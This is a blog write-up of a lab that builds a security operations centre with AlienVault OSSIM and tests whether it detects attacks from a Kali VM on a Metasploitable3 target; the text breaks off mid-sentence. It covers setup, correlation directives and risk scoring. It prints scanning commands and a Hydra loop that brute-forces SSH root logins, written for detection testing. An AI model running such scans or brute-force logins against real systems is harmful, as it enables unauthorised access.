{"id":4359,"date":"2021-10-12T22:47:48","date_gmt":"2021-10-12T14:47:48","guid":{"rendered":"http:\/\/mayanknauni.com\/?p=4359"},"modified":"2021-10-12T23:02:12","modified_gmt":"2021-10-12T15:02:12","slug":"security-ops-centre","status":"publish","type":"post","link":"https:\/\/mayanknauni.com\/?p=4359","title":{"rendered":"Security Ops Centre"},"content":{"rendered":"<h5><strong><em>Disclaimer:- This note was written by me ( Mayank Nauni)\u00a0in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.<\/em><\/strong><\/h5>\n<h1><a name=\"_Toc80823564\"><\/a>Introduction<\/h1>\n<p>The recent rise in cyber-attacks, together with the tighter security regulations imposed on organizations, is making the SOC (Security Operations Centre) a standard security function adopted by an increasing number of organizations. The SOC is the organisational and physical side; its core technology is the SIEM, which in effect is a security system made up of multiple monitoring and analysis components that help organizations detect threats and mitigate them. A SIEM is not a single tool or application but a set of building blocks that together form a system. There is no standard SIEM protocol or established methodology, but most SIEM systems comprise elements such as aggregation of logs from various sources, normalization of those logs into a common format, correlation of events to connect the dots and detect attacks, and finally visualization of the data in dashboards for easy viewing by analysts. This project involves the creation of an internal network with some benign clients and servers and an external malicious attacker launching different types of attack. The network can be built from connected VMs, Mininet or another network virtualization tool. 
The goal is to use an open-source SIEM in the internal network to detect the attacks.<\/p>\n<p>A Security Information Manager is a tool that correlates information from many sources to raise the confidence that an attack is occurring. In the open source community, various tools have been created to monitor different aspects of security. OSSIM combines the data from these tools and correlates it, giving higher confidence when an attack occurs or a host has been compromised, and uses the same data to assess the health of the network. To do this it integrates Host Intrusion Detection Systems (HIDS) with Network Intrusion Detection Systems (NIDS).<\/p>\n<h2><a name=\"_Toc80823565\"><\/a>Lab Setup and Topology<\/h2>\n<p>The network topology is set up using the GNS3 emulator to simulate a security operations centre\u2019s environment. The following are the devices and virtual machines (VMs):<\/p>\n<ul>\n<li>Switch (Gateway) based on Cisco IOS image (12.4) \u2013 10.0.2.1<\/li>\n<li>Kali attacker VM \u2013 2021.2 release \u2013 10.0.2.15<\/li>\n<li>Metasploitable3 VM (based on Windows Server 2008) \u2013 10.0.2.2<\/li>\n<li>OSSIM SIEM VM (AlienVault OSSIM) \u2013 10.0.2.30<\/li>\n<li>GNS3 version 2.2<\/li>\n<li>VirtualBox 6.1<\/li>\n<\/ul>\n<h3><a name=\"_Toc80823566\"><\/a>Topology Brief<\/h3>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4361 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Lab-Topology.jpg?resize=768%2C825&#038;ssl=1\" alt=\"\" width=\"768\" height=\"825\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Lab-Topology.jpg?w=768&amp;ssl=1 768w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Lab-Topology.jpg?resize=279%2C300&amp;ssl=1 279w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>The topology has been created on the GNS3 network emulator, which runs a real IOS image (version 12.4) for the Cisco switch; the Kali 
VM (2021.2 release) and the Metasploitable3 VM are created in VirtualBox, which is integrated with GNS3, and the VMs are connected to the switch using a generic driver (UDP tunnel).<\/p>\n<p>On the switch, we have created a SPAN session that mirrors all traffic on the port connected to the Metasploitable3 VM to the SIEM VM; OSSIM uses this mirrored feed as its NIDS input.<\/p>\n<p>Below is the GNS3 topology created and used for this project:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4362 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/GNS3.jpg?resize=789%2C549&#038;ssl=1\" alt=\"\" width=\"789\" height=\"549\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/GNS3.jpg?w=789&amp;ssl=1 789w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/GNS3.jpg?resize=300%2C209&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/GNS3.jpg?resize=768%2C534&amp;ssl=1 768w\" sizes=\"auto, (max-width: 789px) 100vw, 789px\" \/><\/p>\n<h2><a name=\"_Toc80823567\"><\/a>Strategy<\/h2>\n<p>We built the setup with VirtualBox and GNS3 and followed the process below:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4364 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Strategy.jpg?resize=840%2C588&#038;ssl=1\" alt=\"\" width=\"840\" height=\"588\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Strategy.jpg?w=840&amp;ssl=1 840w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Strategy.jpg?resize=300%2C210&amp;ssl=1 300w, 
https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Strategy.jpg?resize=768%2C538&amp;ssl=1 768w\" sizes=\"auto, (max-width: 840px) 100vw, 840px\" \/><\/p>\n<p>We start with the installation of the required VMs, i.e. OSSIM, Metasploitable3 and Kali, following the specification below. The additional promiscuous-mode vNIC on the OSSIM VM serves as the monitoring port; it receives the traffic mirrored by the SPAN session on the Cisco switch.<\/p>\n<table width=\"495\">\n<tbody>\n<tr>\n<td width=\"109\">VM Name<\/td>\n<td width=\"64\">vCPU<\/td>\n<td width=\"221\">vNIC<\/td>\n<td width=\"36\">RAM (MB)<\/td>\n<td width=\"64\">HDD (GB)<\/td>\n<\/tr>\n<tr>\n<td width=\"109\">OSSIM VM<\/td>\n<td width=\"64\">4<\/td>\n<td width=\"221\">1 NIC x Generic Driver<br \/>\n1 NIC x Promiscuous Mode (Allow all)<\/td>\n<td width=\"36\">8192<\/td>\n<td width=\"64\">600<\/td>\n<\/tr>\n<tr>\n<td width=\"109\">Metasploitable3<\/td>\n<td width=\"64\">2<\/td>\n<td width=\"221\">1 NIC x Generic Driver<\/td>\n<td width=\"36\">8192<\/td>\n<td width=\"64\">100<\/td>\n<\/tr>\n<tr>\n<td width=\"109\">Kali VM<\/td>\n<td width=\"64\">4<\/td>\n<td width=\"221\">1 NIC x Generic Driver<\/td>\n<td width=\"36\">8192<\/td>\n<td width=\"64\">100<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><a name=\"_Toc80823568\"><\/a>Introduction to OSSIM<\/h2>\n<p>OSSIM is a distribution of open source products that are integrated to provide an infrastructure for security monitoring. OSSIM\u2019s objective is to provide a framework for centralizing, organising and improving the detection and display of security events within an enterprise environment. 
This project tests OSSIM\u2019s detection capabilities along with its ability to:<\/p>\n<ul>\n<li>Correlate events<\/li>\n<li>Prioritise the critical events<\/li>\n<li>Perform a risk assessment<\/li>\n<\/ul>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4365 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM.jpg?resize=864%2C465&#038;ssl=1\" alt=\"\" width=\"864\" height=\"465\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM.jpg?w=864&amp;ssl=1 864w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM.jpg?resize=300%2C161&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM.jpg?resize=768%2C413&amp;ssl=1 768w\" sizes=\"auto, (max-width: 864px) 100vw, 864px\" \/><\/p>\n<p>OSSIM consists of three key components: the server, the framework and the agent. Management is performed through a web-based interface and configuration is done through a series of configuration files. Multiple agents can be placed throughout the network.<\/p>\n<p>OSSIM gathers data using sensors. There are three primary ways to collect data:<\/p>\n<ul>\n<li>Using the OSSEC agent (referred to as HIDS in later sections)<\/li>\n<li>Log data such as syslog<\/li>\n<li>Network monitoring of a network segment using a tool that inspects traffic through a promiscuous interface<\/li>\n<\/ul>\n<h2><a name=\"_Toc80823569\"><\/a>Getting the environment ready<\/h2>\n<ul>\n<li>Create the three virtual machines and then immediately take an \u2018Initial Creation\u2019 snapshot.<\/li>\n<li>Configure the hardware options for each virtual machine as per the hardware specification table above and take a snapshot.<\/li>\n<li>Start OSSIM and connect the installation ISO when prompted. 
Configure the required IP address (10.0.2.30) and set the correct time zone (SGT, UTC+8).<\/li>\n<li>If the installation hangs on installing the base system, give it some time. If this persists, check that the VM has a minimum of 4 vCPUs.<\/li>\n<li>Do not attempt two VM operating-system installations at once, and do not have any other VMs or unnecessary programs running during the OSSIM installation.<\/li>\n<li>Install the Metasploitable3 and Kali VMs with all default settings. Make sure to choose the correct time zone, i.e. SGT (UTC+8).<\/li>\n<li>Boot the Kali and Metasploitable3 VMs and configure static IP addresses as shown in the lab topology above.<\/li>\n<\/ul>\n<p>On the Cisco switch, the lines below configure a SPAN session that mirrors the Metasploitable3 traffic to OSSIM\u2019s network monitoring port (Fa1\/3):<\/p>\n<p><em>monitor session 1 source interface Fa1\/1 , Fa1\/4<\/em><\/p>\n<p><em>monitor session 1 destination interface Fa1\/3<\/em><\/p>\n<p>The session can be verified with <em>show monitor session 1<\/em>. Keep in mind that the NIDS only sees what the SPAN session mirrors: any port left out of the source list is invisible to it.<\/p>\n<p>The Cisco switch also acts as the NTP server to synchronise time for this isolated setup; consistent clocks on the sensor, the agent and the server matter because directive correlation windows are time-based. 
The time is set to GMT+8, Singapore Time.<\/p>\n<h2><a name=\"_Toc80823570\"><\/a>OSSIM Configuration<\/h2>\n<ul>\n<li>Once installation has completed, take a snapshot.<\/li>\n<li>When the OSSIM console shows the terminal below, the web UI can be accessed from the Kali VM at the IP address assigned to the OSSIM box, 10.0.2.30.<\/li>\n<\/ul>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4366 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM1.jpg?resize=837%2C348&#038;ssl=1\" alt=\"\" width=\"837\" height=\"348\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM1.jpg?w=837&amp;ssl=1 837w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM1.jpg?resize=300%2C125&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM1.jpg?resize=768%2C319&amp;ssl=1 768w\" sizes=\"auto, (max-width: 837px) 100vw, 837px\" \/><\/p>\n<ul>\n<li>Log in to the OSSIM web UI and start the Getting Started wizard.<\/li>\n<li>On Network Interfaces, click Next; we have two interfaces, one for monitoring and one for management.<\/li>\n<li>On Asset Discovery, ensure that all VMs, i.e. 
Kali and Metasploitable3, are displayed.<\/li>\n<li>Deploy HIDS, the OSSEC agent, on the Windows-based Metasploitable3 VM.<\/li>\n<li>Validate the OSSIM configuration, starting with the sensor configuration: ethernet0 is assigned for management and ethernet1 performs network monitoring:<\/li>\n<\/ul>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4367 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM3.jpg?resize=813%2C510&#038;ssl=1\" alt=\"\" width=\"813\" height=\"510\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM3.jpg?w=813&amp;ssl=1 813w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM3.jpg?resize=300%2C188&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM3.jpg?resize=768%2C482&amp;ssl=1 768w\" sizes=\"auto, (max-width: 813px) 100vw, 813px\" \/><\/p>\n<ul>\n<li>Now go to Environment -&gt; Detection -&gt; Agents to validate that the Metasploitable3 agent is installed and active:<\/li>\n<\/ul>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4368 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM5.jpg?resize=861%2C339&#038;ssl=1\" alt=\"\" width=\"861\" height=\"339\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM5.jpg?w=861&amp;ssl=1 861w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM5.jpg?resize=300%2C118&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM5.jpg?resize=768%2C302&amp;ssl=1 768w\" sizes=\"auto, (max-width: 861px) 100vw, 861px\" \/><\/p>\n<p>We can conclude that the base setup is ready.<\/p>\n<p><strong>Adding Asset<\/strong><\/p>\n<p>Let us understand how OSSIM calculates the asset 
value and risk value. OSSIM uses the asset value assigned to a system, combined with the reliability and priority values of the received events, to calculate risk. There are three ways a host gets an asset value: it is assigned one explicitly, it inherits the asset value of the network on which it resides, or it has none assigned and OSSIM falls back to its default. This host asset value is then used to calculate risk whenever an event is received. The section below explains the priority and risk values.<\/p>\n<p><strong>Creating a host asset value<\/strong><\/p>\n<p>Asset values were covered in the previous section. For a host you can view its value under policy hosts. The asset value ranges from 1 to 5: 1 signifies a host of little value, 5 is the highest importance one can give a host. Priority (0 to 5, how serious the event type is) and reliability (0 to 10, how confident the detector is that the event is a true positive) come from the event and the directive, and risk is calculated with the formula below, which yields a value from 0 to 10:<\/p>\n<p><em>risk = asset * (reliability * priority \/ 25)<\/em><\/p>\n<p>As a quick sanity check, with everything at its maximum (asset 5, reliability 10, priority 5) the formula gives 5 * (50 \/ 25) = 10, while a low-confidence event (reliability 1, priority 1) on the same asset scores only 0.2, which is why a single noisy signature rarely becomes an alarm on its own.<\/p>\n<p>Below is a screenshot displaying the data for the host named metasploit3. 
It has an IP address of 10.0.2.2 and the highest asset value of 5.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4369 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM6.jpg?resize=636%2C591&#038;ssl=1\" alt=\"\" width=\"636\" height=\"591\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM6.jpg?w=636&amp;ssl=1 636w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM6.jpg?resize=300%2C279&amp;ssl=1 300w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/p>\n<h2><a name=\"_Toc80823571\"><\/a>Investigating the Dashboard<\/h2>\n<p>The OSSIM dashboard is intuitive and carries a great deal of information. The Executive dashboard, shown below, gives a quick view of:<\/p>\n<ol>\n<li>Security Events: Top 5 Alarms<\/li>\n<li>SIEM: Top 10 Event Categories<\/li>\n<li>SIEM vs Logger Events<\/li>\n<li>Top 10 Hosts with multiple events<\/li>\n<li>SIEM Events by Sensor \/ Data Source (which sensor has been sending the majority of events: HIDS is the agent installed on Metasploitable3, NIDS is the data captured on the network monitoring interface)<\/li>\n<\/ol>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4370 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM7.jpg?resize=807%2C474&#038;ssl=1\" alt=\"\" width=\"807\" height=\"474\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM7.jpg?w=807&amp;ssl=1 807w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM7.jpg?resize=300%2C176&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM7.jpg?resize=768%2C451&amp;ssl=1 768w\" sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/p>\n<p>We can see 
some data on the dashboard already, as I\u2019ve tried a couple of attacks on Metasploitable3 which are reflected here.<\/p>\n<h2><a name=\"_Toc80823572\"><\/a>Attack Details<\/h2>\n<p><strong>Establishing the attack surface<\/strong><\/p>\n<p>We run an nmap port scan that queries all ports (-p 1-65535), skips host discovery (-Pn), includes service version detection (-sV) and saves the results as XML (-oX) to metasploitable3.xml. The scan is saved so that it can be imported into the Metasploit Framework, which needs its database initialised first. The commands, in order, are:<\/p>\n<ul>\n<li>nmap -sV -Pn -T4 -p 1-65535 -oX metasploitable3.xml 10.0.2.2<\/li>\n<li>msfdb init<\/li>\n<li>sudo systemctl start postgresql<\/li>\n<li>msfconsole<\/li>\n<li>db_import metasploitable3.xml<\/li>\n<li>services<\/li>\n<\/ul>\n<p>The <em>services<\/em> command in msfconsole gives an overview of all services found on the victim machine; the attacks in later sections target these services.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4371 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/metasploit.jpg?resize=807%2C582&#038;ssl=1\" alt=\"\" width=\"807\" height=\"582\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/metasploit.jpg?w=807&amp;ssl=1 807w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/metasploit.jpg?resize=300%2C216&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/metasploit.jpg?resize=768%2C554&amp;ssl=1 768w\" sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/p>\n<p>To validate the functionality of our SIEM, we run the five kinds of attack below and see whether OSSIM detects them:<\/p>\n<ul>\n<li>Brute 
force<\/li>\n<li>Probe<\/li>\n<li>ShellShock (using Nikto)<\/li>\n<li>Attempting to exploit Jenkins<\/li>\n<li>Attempting to initiate a remote shell<\/li>\n<\/ul>\n<p><strong>Directives (Customised Rules)<\/strong><\/p>\n<ul>\n<li>ShellShock \u2013 CVE-2014-6271<\/li>\n<li>NMAP<\/li>\n<\/ul>\n<p>To raise alarms for these attacks we created a couple of directives in which the conditions for detecting an attack are defined. The first condition is that either the HIDS (OSSEC agent) or the NIDS (port mirroring) must see the traffic and produce a matching event, since a directive can only correlate events that a sensor has already reported.<\/p>\n<p>We created custom directives to detect NMAP and ShellShock. Many connections from a single host (possibly one with a bad reputation) to the destination server on the ShellShock-targeted port (or across many ports, for NMAP) may indicate such an attack. We can check NIDS events for connections to the victim server and trigger an alarm once the correlation engine sees that the number of connections is dangerously high.<\/p>\n<p>The four correlation rules in the NMAP directive below check the number of connections to the server using a NIDS plugin. 
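<\/p>\n<p>To make the asset, priority and reliability mechanics concrete, here is a small Python model of a correlation directive, written for this write-up and not taken from OSSIM\u2019s code. It walks a stream of sensor events through ordered rule levels, raising the directive\u2019s reliability at each satisfied level and computing risk with the formula from the asset section. The event line format, the occurrence and reliability values, the directive priorities and the sample NMAP and SSH brute-force streams are all assumptions chosen for illustration; only the risk formula and the asset value of 5 for 10.0.2.2 come from this page.<\/p>
```python
# Toy model of an OSSIM-style correlation directive. Added example for this
# write-up, not OSSIM code. Assumptions (not from the page): the event line
# format, the occurrence/reliability values per rule level, the directive
# priorities and the sample event streams.
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    plugin: str                  # 'nids' (mirror port sensor) or 'hids' (OSSEC agent)
    signature: str               # substring the event name must contain
    occurrence: int              # matches needed before this level is satisfied
    reliability: int             # directive reliability (0-10) once satisfied
    distinct_ports: bool = False  # count distinct dst ports instead of raw events


@dataclass(frozen=True)
class Directive:
    name: str
    priority: int                # 0-5, set per directive
    rules: Tuple[Rule, ...]      # ordered levels, satisfied one after another


def parse_events(lines: List[str]) -> List[Dict[str, str]]:
    '''Parse constructed 'plugin|src|dst|dport|event name' lines (one event each).'''
    events = []
    for line in lines:
        plugin, src, dst, dport, name = line.strip().split('|', 4)
        events.append({'plugin': plugin, 'src': src, 'dst': dst,
                       'dport': dport, 'name': name})
    return events


def risk(asset: int, reliability: int, priority: int) -> float:
    '''Risk formula quoted on the page: asset * (reliability * priority / 25).'''
    return round(asset * (reliability * priority / 25), 2)


def correlate(directive: Directive, events: List[Dict[str, str]],
              asset_values: Dict[str, int], default_asset: int = 2):
    '''Run one directive over an event stream, keeping state per (src, dst).

    Each time a rule level is satisfied, append (src, dst, level, reliability,
    risk) to the result; the directive then waits for the next level.'''
    state: Dict[Tuple[str, str], dict] = {}
    fired = []
    for ev in events:
        key = (ev['src'], ev['dst'])
        st = state.setdefault(key, {'level': 0, 'count': 0, 'ports': set()})
        if st['level'] >= len(directive.rules):
            continue                           # every level already satisfied
        rule = directive.rules[st['level']]
        if ev['plugin'] != rule.plugin or rule.signature not in ev['name']:
            continue                           # event does not feed this level
        if rule.distinct_ports:
            st['ports'].add(ev['dport'])
            st['count'] = len(st['ports'])
        else:
            st['count'] += 1
        if st['count'] >= rule.occurrence:
            asset = asset_values.get(ev['dst'], default_asset)
            fired.append((ev['src'], ev['dst'], st['level'], rule.reliability,
                          risk(asset, rule.reliability, directive.priority)))
            st.update(level=st['level'] + 1, count=0, ports=set())
    return fired


def max_risk(fired) -> Optional[float]:
    '''Highest risk reached, or None when no level fired (no events, no alarm).'''
    return max((f[4] for f in fired), default=None)


# Directives mirroring the NMAP and brute-force use cases (values assumed).
NMAP = Directive('NMAP probe', priority=4, rules=(
    Rule('nids', 'connection', 5, 2, distinct_ports=True),
    Rule('nids', 'connection', 10, 5, distinct_ports=True),
    Rule('nids', 'connection', 20, 8, distinct_ports=True)))
BRUTE = Directive('SSH brute force', priority=3, rules=(
    Rule('hids', 'authentication failed', 3, 3),
    Rule('hids', 'authentication failed', 10, 6),
    Rule('hids', 'authentication failed', 20, 9)))

# Asset values as set in the OSSIM UI: metasploitable3 carries the maximum of 5.
ASSETS = {'10.0.2.2': 5}

# Constructed sample streams (not captured from the lab): a 40-port scan from
# Kali and fifteen failed SSH logins reported by the agent on the victim.
SCAN_LOG = ['nids|10.0.2.15|10.0.2.2|%d|connection' % p for p in range(1, 41)]
BRUTE_LOG = ['hids|10.0.2.15|10.0.2.2|22|sshd: authentication failed for root'] * 15

if __name__ == '__main__':
    for directive, log in ((NMAP, SCAN_LOG), (BRUTE, BRUTE_LOG)):
        hits = correlate(directive, parse_events(log), ASSETS)
        print(directive.name, hits, 'max risk:', max_risk(hits))
    # Jenkins exploit / reverse shell: no sensor events, so nothing to correlate.
    print('silent attack max risk:', max_risk(correlate(NMAP, [], ASSETS)))
```
<p>Running it shows the NMAP directive firing three times (reliability 2, 5 and then 8) as the number of distinct probed ports grows, with risk climbing from 1.6 to 6.4 on the asset-5 host; the brute-force directive fires twice for fifteen failed logins; and an attack that produced no sensor events yields no alarm at all, which is exactly the situation the Results section later describes for the Jenkins exploit and the reverse shell.<\/p>
<p>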
Every time a rule in the correlation directive matches an event, the reliability of the directive event increases, and with it the risk of the event.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4372 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM8.jpg?resize=786%2C249&#038;ssl=1\" alt=\"\" width=\"786\" height=\"249\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM8.jpg?w=786&amp;ssl=1 786w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM8.jpg?resize=300%2C95&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM8.jpg?resize=768%2C243&amp;ssl=1 768w\" sizes=\"auto, (max-width: 786px) 100vw, 786px\" \/><\/p>\n<h3><a name=\"_Toc80823573\"><\/a>Nmap Probe<\/h3>\n<p>We used the command below to probe Metasploitable3 (default scripts, service version detection, output in all formats under the base name project):<\/p>\n<p>Command: <em>nmap -sC -sV -oA project 10.0.2.2<\/em><\/p>\n<p>I could see the directive being triggered by the nmap attempts.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4373 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM9.jpg?resize=819%2C450&#038;ssl=1\" alt=\"\" width=\"819\" height=\"450\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM9.jpg?w=819&amp;ssl=1 819w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM9.jpg?resize=300%2C165&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM9.jpg?resize=768%2C422&amp;ssl=1 768w\" s

izes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/p>\n<p>On the Analysis -&gt; Alarms page I could see this alarm recorded as well:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4374 size-full\" 
src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM10.jpg?resize=819%2C537&#038;ssl=1\" alt=\"\" width=\"819\" height=\"537\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM10.jpg?w=819&amp;ssl=1 819w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM10.jpg?resize=300%2C197&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM10.jpg?resize=768%2C504&amp;ssl=1 768w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/p>\n<p>By clicking the alarm we can see more details about it, such as the protocol and the data source that reported it.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4375 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM11.jpg?resize=816%2C537&#038;ssl=1\" alt=\"\" width=\"816\" height=\"537\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM11.jpg?w=816&amp;ssl=1 816w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM11.jpg?resize=300%2C197&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM11.jpg?resize=768%2C505&amp;ssl=1 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/p>\n<h3><a name=\"_Toc80823574\"><\/a>Bruteforce and Packet Capture<\/h3>\n<p>We used Hydra to launch a brute-force attack on port 22 through repeated SSH login attempts; the shell loop repeats the single root\/admin attempt 100 times to generate a steady stream of failed logins for the HIDS to report:<\/p>\n<p>Command: <em>for i in {1..100}; do hydra -l root -p admin 10.0.2.2 -t 4 ssh;done<\/em><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4376 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/hydra.jpg?resize=792%2C339&#038;ssl=1\" alt=\"\" width=\"792\" height=\"339\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/hydra.jpg?w=792&amp;ssl=1 792w, 
https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/hydra.jpg?resize=300%2C128&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/hydra.jpg?resize=768%2C329&amp;ssl=1 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/p>\n<p>As seen in the snapshot below, OSSIM was able to detect the brute-force attempt and report it.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4377 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM12.jpg?resize=801%2C489&#038;ssl=1\" alt=\"\" width=\"801\" height=\"489\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM12.jpg?w=801&amp;ssl=1 801w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM12.jpg?resize=300%2C183&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM12.jpg?resize=768%2C469&amp;ssl=1 768w\" sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/p>\n<p>The alarm detail shows the destination and the source; the source is shown as the Metasploitable3 